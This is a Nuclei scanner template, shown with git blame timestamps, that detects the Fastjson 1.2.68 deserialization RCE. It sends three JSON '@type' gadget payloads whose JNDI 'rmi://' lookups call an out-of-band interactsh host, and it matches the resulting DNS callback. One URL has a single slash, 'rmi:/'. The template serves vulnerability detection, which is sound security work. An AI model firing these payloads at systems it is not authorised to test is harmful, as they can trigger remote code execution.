nuclei-templates/vulnerabilities/fastjson/fastjson-1-2-68-rce.yaml

64 lines
1.6 KiB
YAML
Raw Normal View History

2021-10-30 11:17:35 +00:00
id: fastjson-1-2-68-rce
2021-10-12 05:57:50 +00:00
info:
name: Fastjson 1.2.68 - Remote Code Execution
2021-10-12 05:57:50 +00:00
author: zh
severity: critical
2022-05-31 08:42:39 +00:00
description: |
Fastjson 1.2.68 is susceptible to a deserialization remote code execution vulnerability.
2021-10-12 05:57:50 +00:00
reference:
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
- https://github.com/wyzxxz/fastjson_rce_tool
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
2021-10-18 20:40:26 +00:00
tags: fastjson,rce,deserialization,oast
2021-10-12 05:57:50 +00:00
requests:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"@type":"org.apache.shiro.jndi.JndiObjectFactory",
"resourceName":"rmi://{{interactsh-url}}/Exploit"
}
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup",
"jndiNames":"rmi://{{interactsh-url}}/Exploit"
}
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"@type":"br.com.anteros.dbcp.AnterosDBCPConfig",
"metricRegistry":"rmi:/{{interactsh-url}}/Exploit"
}
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms DNS Interaction
words:
2021-10-12 06:37:05 +00:00
- "dns"
- type: status
negative: true
status:
- 200
# Enhanced by mp on 2022/05/25